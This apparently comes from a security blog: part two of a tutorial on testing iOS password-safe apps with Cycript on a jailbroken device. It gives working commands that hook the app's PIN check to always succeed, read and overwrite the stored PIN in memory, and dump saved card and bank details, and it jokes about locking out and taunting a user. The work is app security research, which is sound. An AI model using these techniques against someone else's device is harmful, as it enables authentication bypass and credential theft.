Hack Whack and Smack

IOS App Testing – Part 2

Okay so it might be a long time coming…

Part 2:

In part two we are again looking at Password Safe Apps but this time the App stores data in an unintelligible format (looks to be encrypted or at least encoded based on the method calls to read file in). Either way the files are not in clear text and from the class-dump we are calling an XFFile format which I couldn’t work out how to open. Part two is going to be looking at how to:

1. Execute actions

2. Mess with variables

3. Bypass logins and read files from apparently secure files.

Execute actions:

We have already followed steps from part 1 detailing how to dump the class information from an encrypted App using clutch and can now see that each function has a number of actions. Actions as I am referring to them are commands such as check-password or terminate application. The demo in this case will just be to lock the app. Which if put on a loop could be particularly funny should someone be trying to access their information:

The class dump shows the following output under AppDelegate:

–CUT–

-(void)initFileCount;

-(void)freeVersionWarning;

-(id)cloudURL;

-(void)loadData;

-(void)lock;

-(void)takePicture;

-(void)dealloc;

-(void)rateMyApp;

–CUT–

Therefore it is possible to execute the action by calling the class method and appropriate action with:

[UIApp.Delegate lock]

Some other interesting functionality can be seen such as takePicture and freeVersionWarning. The warning is particularly annoying. It would be interesting to change the message and have it pop up…

Messing with variable or property value:

This is just a quick and dirty example to show how to change messages on the screen and set variables or booleans. The screen at the time of login shows a nice message stating that the user should enter a password. Well I think we should be modifying that to some slanderous dig about the individuals man hood…….or at least to inform them of this new found predicament they are about to find them self in as we move through the next section.

Anyway to changing value:

Let’s start with where we are in the app on the screen and compare it to the method calls and associated variables.

cy# UIApp.keyWindow.rootViewController.visibleViewController

#”<InputView: 0x1fd67ed0>”

Reviewing the inputView method reveals a few interesting variables

–CUT–

-(void)changeType:(id)type;

-(void)reloadViews;

-(id)init;

(void)updateTittle:(id)tittle;

–CUT–

The one we are interested in is updateTittle the command below shows how we can check the title message by reviewing the inputViewTitle:

cy#[UIApp.keyWindow.rootViewController.visableViewController inputViewTitle]

Before:

originalmessage

No we can use the updateTittle to change the message given to the user at the login screen:

cy#[UIApp.keyWindow.rootViewController.visableViewController updateTittle: “Password is wrong mwahahaha”]

After:

newmessage

I have to reign in the insults so not to offend all the woman and children that visit the site…..

That was fun and all but what about breaking stuff….fear not…we’re here, the first parts are import in changing and manipulating the App and its response.

Breaking Stuff:

The first thing I am going to demonstrate how easy it is first and foremost to bypass the pin.

The method inputView actually has a delegate method called login this can be found by running the following command and reviewed in the class-dump:

cy# UIApp.keyWindow.rootViewController.visibleViewController.delegate

#”<login: 0x1fdc9fc0>”

There is no need to go into great detail here it’s just the same as part one where we change a boolean function to return true. This was a little harder as there were multiple methods called and required a bit more digging. Don’t forget there are a number of usual functions at cycript for exploring the app.

The following command can be used to set the inputDidTestingPassword function to true, which results in the application allowing access with any pin, this is important as it informs us that a comparison is done on the password:

cy#UIApp.keyWindow.rootViewController.visibleViewController.delegate->isa.messages[‘inputDidTestingPassword:’] = function() { return true}

Stealing and Resetting the PIN:

The first thing we have to look at is the class-dump which shows the file userData being read in at the start of the method login which is a delegate of inputView:

login-method

Therefore if it’s going to be loaded into memory I want to be able to read it – or at least that is the plan. The following commands detail how to read files, the file in this case is userData:

cy# UIApp.keyWindow.rootViewController.visibleViewController.delegate.userData

#”<XFFile: 0x1e56fc40>”

cy# UIApp.keyWindow.rootViewController.visibleViewController.delegate.userData.data

@{“password”:”1402″,”fileHidden”:true}

reading and changing pin

And there she is…..cycript is awesome!!!

Now let’s consider our earlier task of changing the message……..

Yep we can update the information in memory as per the screenshot above:

cy# UIApp.keyWindow.rootViewController.visibleViewController.delegate.userData.data = {“password”:”1234″,”fileHidden”:true}

{password:”1234″,fileHidden:true}

We can now login with the PIN 1234! HEHEHE not to forget the message about man hood!……………This could be quite a shock to a user of the App who ends up locked out and abused!

And logged in:

login

It is possible to access other files in the same way. I was to access the data while the app was open on the page. As can be see below

cy# UIApp.keyWindow.rootViewController.visibleViewController.file.data

@{“data”:@[@{“key”:”Account Number”,”value”:”3131313131″,”type”:6},@{“key”:”PIN”,”value”:”5555″,”type”:4},@{“key”:”Type”,”value”:”MasterCard”,”type”:12},@{“key”:”Bank Name”,”value”:”Happy Bank”,”type”:7},@{“key”:”Address”,”value”:””,”type”:7},@{“key”:”Owner”,”value”:””,”type”:7},@{“key”:”SWIFT Code”,”value”:””,”type”:1},@{“key”:”Routing Number”,”value”:””,”type”:10},@{“key”:”IBAN”,”value”:””,”type”:10},@{“key”:”Hotline”,”value”:””,”type”:11},@{“key”:”Notes”,”value”:””,”type”:9}],”imgName”:”154.png”}

The information available clearly details credit card information and pins normally secured, proving nothing is safe if your phone is rooted.

creditcard details

There will of course be a part three and the idea this time is not to wait so long and then rush something through ;-P